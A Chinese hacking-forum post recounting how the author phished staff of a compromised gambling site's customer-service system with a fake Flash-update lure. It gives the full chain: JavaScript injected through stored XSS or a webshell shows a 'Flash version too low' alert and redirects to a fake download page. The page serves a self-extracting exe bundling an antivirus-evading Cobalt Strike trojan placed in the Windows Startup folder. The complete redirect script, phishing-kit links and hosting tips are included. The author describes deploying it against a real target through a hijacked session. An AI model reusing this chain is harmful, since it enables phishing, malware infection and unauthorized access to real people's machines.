flash钓鱼

kanjin   ·   发表于 2021-04-28 16:18:35   ·   实战纪实

前言:

这篇文章写在我搞到某个bc的边缘系统的时候,没啥重要信息,而且没内网。但因为这是个客服系统所以,我决定钓鱼。想想都特码刺激。

准备:

  1. 服务器,存放钓鱼页面
    2.域名
    3.免杀木马
    4.fash页面
    总体思路就是:对方有存储xss漏洞或者你有网站权限—>插入js触发flash版本过低弹窗—>对方点击确定—>跳转到我们的flash界面—>对方点击下载并安装—>触发我们的木马—>木马连接cs。

    flash钓鱼套件

    https://github.com/r00tSe7en/Flash-Pop 美化版的弹窗(想用的可以看看)
    https://github.com/hackxc/xss_flash 网址在这

他把所有能用到的工具都打包了,我们只需要弄个自解压文件,把木马和正常的flash安装包压缩,然后设置图标,设置解压后启动 。设置木马解压位置为(C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup)windows的自启动目录。 比较简单这里不放图了。自己摸索一下就知道了。再不会可以百度。
这里面的js弹窗是一直弹,就没法正常访问页面了,对方再蠢也知道中病毒了吧。我自己百度又结合这个改了一个 过段时间就会弹一次(时间需要自己设,毫秒为单位).
version.js

  1. function getCookie(name) {
  2. var cookiefound=false
  3. var start=0
  4. var end=0
  5. var cookiestring=document.cookie;
  6. var i=0;
  7. while (i<=cookiestring.length)
  8. {
  9. start=i
  10. end=start+name.length
  11. if (cookiestring.substring(start,end)==name)
  12. {cookiefound=true;
  13. break;
  14. }
  15. i++;
  16. }
  17. if (cookiefound==true)
  18. {
  19. start=end+1;
  20. end=cookiestring.indexOf(";",start);
  21. if (end<start)
  22. {
  23. end=cookiestring.length;}
  24. return cookiestring.substring(start,end);
  25. }
  26. return "";
  27. }
  28. function newcookie(id,value,guoqi)
  29. {
  30. var expires=new Date()
  31. expires.setTime(expires.getTime()+20*60*1000) //我这里设置了每1/3小时弹一次。
  32. var expiryDate=expires.toGMTString();
  33. document.cookie=id+"="+value+";expires="+expiryDate
  34. }
  35. if (getCookie("Alerted")=="") {
  36. window.alert = function(name){
  37. var iframe = document.createElement("IFRAME");
  38. iframe.style.display="none";
  39. iframe.setAttribute("src",'data:text/plain,');
  40. document.documentElement.appendChild(iframe);
  41. window.frames[0].window.alert(name);
  42. iframe.parentNode.removeChild(iframe);
  43. }
  44. alert( "Your flash version is too low, try to upgrade and visit this page! ");
  45. window.location.href="http://flashHacker.com"; #修改成你自己的免费域名
  46. newcookie("Alerted","yes");
  47. }
  48. else
  49. {
  50. newcookie("Alerted","");
  51. }

免杀木马:

通过cs生成shellcode,然后通过python进行分离免杀。
具体看我的博客(好久没更新了)
http://kanjinisme.gitee.io/blog/2020/12/11/cs%E5%85%8D%E6%9D%80%E9%A9%AC/#more
现在我们木马有了,我们就可以通过winrar的自解压功能制作exe文件了。这里是我制作的。

你不一定要跟我一样,你可以通过RLO改成zip后缀等等自己发挥把。

服务器:

这里我们使用的是香港服务器
http://www.webweb.com/
并赠送我们免费域名,我们可以通过临时邮箱注册,记住我们的用户名一定要起一个flash相关的名字,因为他赠送的免费域名是以我们的用户名起的。
但是这个免费的服务器有个很大的弊端,就是没能建立有汉字的页面,否则会报错。

找到文件管理,进入site1文件夹,在里面放入我们的flash.html页面.注意该页面不能有中文,中文符号也不行。不支持utf-8编码。
我们可以把flash.html里的中文都翻译成英文。然后就可以了.


它的文件上传功能不好用,我直接复制flash.html里的内容,然后,通过上图添加文件功能,添加的,修改名字为index.html.点击旁边的编辑按钮,我们可以把自己木马的地址(这里文件上传不好用,我把木马地址放我自己vps上了。)

在域名绑定里我们可以看到给我们分配的域名 ,这域名……好吧,毕竟是免费的。

访问一下,看看效果。

ok,没问题。

好了 ,该准备的,都准备好了,
然后你们就可以找一些存储型xss去弹了。

而我不同,
蚁剑启动!!! 随机挑选一个幸运儿。


直接修改网页。
然后再他的管理后台,客服服务界面,都加上了。
这里我直接将弹窗的js传上他的系统了,你也可以传到香港云上面。xss代码如下。

<script src="http://你的域名"></script>

<script> src="/version.js"></script>
等鱼儿上钩吧。嘿嘿~~~

最后:

香港云给的域名是http协议的,https无法跳转到http的域名,即如果对方是https协议的网站,无法通过我们的js跳转到http的网站,它认为是不安全的。,所以可以用gitee来搭建。

好的,注册一个gitee账号,账号名最好起flash相关的,之后需要绑定手机号,然后创建仓库,创建完成之后,点击服务,使用


然后点击启。。。我TM!@#¥%……&*()——

结束。
(还没结束。。。)

这次真的最后了:

早上刚上班,发现风哥问我后续,我就在说说我咋办的吧。上面两种都没法用了,所以我决定直接把flash钓鱼页面上传到他的服务器上(自己的网站让下载flash,应该会信吧?会信吗?不会信吗?会信吗……),在他服务的根目录建立一个.flash目录(隐藏目录),把马和flash都放到里面,然后js那里,我们改成https://bc域名/.flash/index.html 也可以通过相对路径访问。


我用的是相对路径。
我之前爆破了一个客服账号,所以我通过其他漏洞获取的session登进去(不要问我为啥不用账号登,问就是会顶号,session不会。)试了下发现成功弹窗、成功跳转(不截图了,公司让保密)。
写到这,我接着就打开cs看看鱼儿上钩了没…..唉,我草,上线了。 这人得多笨啊。

赶紧打开他的桌面看看他在干啥。

咦,他怎么也再用cs……这尼玛不就是我嘛,昨天测试忘了删除自启动目录的木马了。

用户名金币积分时间理由
Track-聂风 80.00 0 2021-04-30 14:02:48 目标也在用CS真的是骚呀

打赏我,让我更有动力~

1 Reply   |  Until 2021-4-29 | 1187 View

Track-聂风
发表于 2021-4-29

有没有后续了?写的可还行

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2023 掌控者 All Rights Reserved.